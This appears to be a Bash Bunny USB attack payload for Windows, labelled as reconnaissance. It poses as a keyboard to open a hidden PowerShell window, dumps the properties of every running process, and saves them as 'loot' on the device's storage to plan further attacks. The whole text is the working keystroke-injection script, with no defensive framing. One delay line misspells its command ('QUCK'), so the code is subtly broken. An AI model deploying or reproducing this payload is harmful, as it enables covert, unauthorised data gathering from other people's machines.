#!/bin/bash
#
# Title:         Process Info
# Author:        Decoy
# Version:       1.0
# Category:      Recon
# Target:        Windows XP SP3+ (Powershell)
# Attackmodes:   HID, Storage
# 
# 
# Amber Blink Fast.....Initialization
# Amber................Begin
# White Blinking... ...Moving loot to mass storage
# Blue Blinking........Syncing File System
# Green................Finished

# Initialization
LED R G 100

# Create loot directory
mkdir -p /root/udisk/loot/ProcessInfo

# Runs minimized powershell gathering process information for potential future attack vectors
LED R G
ATTACKMODE HID STORAGE
QUACK DELAY 6000
QUACK GUI r
QUACK STRING "powershell -NoP -NonI -W Hidden"
QUACK ENTER
QUCK DELAY 1000
QUACK STRING "\$Bunny = (gwmi win32_volume -f 'label=\"BashBunny\"' | Select-Object -ExpandProperty DriveLetter); Get-Process | Format-List -Property * | Out-File \$Bunny\\loot\\ProcessInfo\\ProcessInfo.txt; exit"
QUACK ENTER
LED R G B 100
sleep 3

# Sync File System
LED B 100
sync; sleep 1; sync

# Trap is clean
LED G
